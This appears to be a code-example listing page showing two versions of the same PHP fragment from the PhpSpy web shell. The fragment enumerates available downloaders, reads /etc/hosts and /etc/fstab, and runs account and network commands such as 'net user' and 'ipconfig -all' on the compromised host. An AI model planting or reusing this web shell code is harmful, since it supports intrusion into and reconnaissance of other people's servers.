Ejemplo n.º 1
0
            $temp = array();
            foreach ($downloaders as $item) {
                if (which($item)) {
                    $temp[] = $item;
                }
            }
            secparam('Downloaders', implode(', ', $temp));
            secparam('Hosts', @file_get_contents('/etc/hosts'));
            secparam('HDD space', execute('df -h'));
            secparam('Mount options', @file_get_contents('/etc/fstab'));
        }
    } else {
        secparam('OS Version', execute('ver'));
        secparam('Account Settings', execute('net accounts'));
        secparam('User Accounts', execute('net user'));
        secparam('IP Configurate', execute('ipconfig -all'));
    }
} else {
    m('Undefined Action');
}
?>
</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
	<span style="float:right;"><?php 
debuginfo();
ob_end_flush();
?>
</span>
	Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php 
echo str_replace('.', '', 'P.h.p.S.p.y');
?>
Ejemplo n.º 2
0
            $temp = array();
            foreach ($downloaders as $item) {
                if (which($item)) {
                    $temp[] = $item;
                }
            }
            secparam('Downloaders', implode(', ', $temp));
            secparam('Hosts', @file_get_contents('/etc/hosts'));
            secparam('HDD space', xbox('df -h'));
            secparam('Mount Options', @file_get_contents('/etc/fstab'));
        }
    } else {
        secparam('OS Version', xbox('ver'));
        secparam('Account Settings', xbox('net accounts'));
        secparam('User Accounts', xbox('net user'));
        secparam('IP Configurate', xbox('ipconfig -all'));
    }
} else {
    m('Undefined Action');
}
echo '</td></tr></table>
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
<span style="float:left;">Charset:';
makeselect(array('name' => 'charsetpage', 'option' => $charsetpagedb, 'selected' => $charsetpage, 'onchange' => 'g(\'' . $action . '\',null,null,null,null,null,null,this.value);'));
echo '</span>
<span style="display: block; text-align: right;">';
debuginfo();
ob_end_flush();
echo '</span>
</div>
</body>